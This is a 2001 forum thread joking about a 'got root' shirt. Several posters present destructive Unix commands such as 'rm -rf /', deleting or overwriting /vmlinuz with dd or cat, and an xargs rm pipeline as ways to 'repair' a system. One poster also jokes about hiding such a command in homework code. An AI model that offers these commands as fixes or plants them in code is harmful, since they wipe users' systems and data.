I've got some nice happy thinkgeek shirts. Whenever I wear my got root shirt, everyone who knows ABSOLUTELY NOTHING ABOUT TECHNOLOGY BEYOND LOGGING ONTO AOL AND SENDING PICTURES OF THEIR SON TO GRANDPA pretends they understand my shirt. "Oh, yeah, hey, I've got root!""Hey, have you got root?" GAGGAGGAGGAGGAGGAGGAGGAGRANT Posted by miNus on Nov. 17 2001,02:03

Funny. For all the talking about itself your program does, it doesn't ever accomplish anything. Sad, really./me pours out a 40 oz on the curb for that useless code Posted by CaptainEO on Nov. 18 2001,02:58
Yeah but the cool thing is it will almost compile! (except for '40_oz' and the screwy typedef near the end, and assuming the included headers are OK).Argh I have been programming too much lately =). New idea- write a code obfuscator that renames all your variables into gangsta/l33t spe4k... *this ain't too far-fetched... In the NVIDIA graphics driver for linux, they hide their internal symbol names by changing them to nvsym_0001, 0002, etc... They could really show some more creativity. quote: It is god of a unix box. as root you can run the repair machine command. It gets used so much it got cut down to rm. Go try it now ------------------ Posted by ASCIIMan on Nov. 18 2001,18:13
Or if you want to repair the machine even quicker you can use the "really fast" option:rm -rf Posted by DeadAnztac on Nov. 18 2001,18:29
no, no, no see, first you have to repair the kernel, so you use the sysadmin tool rm, now you use the flags -r r for repair, and -f is the precursor for the location. Then you can find your kernel in /vmlinuz so, "rm -rf /vmlinuz". Alternativly, it can be done this way "rm -rf /" or even "find / -print | xargs | rm -f" All of these will repair your system quickly. The real masters often run such command sequences such as "mkdir f1; mkdir f1/f2; ln -d f1 f1/f2;" or even "dd if=/dev/null of=/vmlinuz"*Note, on some systems you can find vmlinux under /boot/ ------------------ This message has been edited by DeadAnztac on November 19, 2001 at 01:30 PM Posted by Spydir on Nov. 18 2001,18:46

yeha, too bad i dont have access to a unix box....
Posted by Beldurin on Nov. 18 2001,21:20
heh, heh, hehI actually thought about embedding the repair machine really fast command into one of my CS proggys for a prof that never checked source code. heh, heh, heh PS works w/Linux too ------------------ Posted by Dark Knight Bob on Nov. 19 2001,10:34
quote: wow so like if its broke it fixes it. even if i hit it with a hammer it will magically repair itself....i didnt know linux was THAT powerful! ------------------ Posted by semper on Nov. 21 2001,01:11
I find that this works better:cat /bin/ls > /vmlinuz And restart |
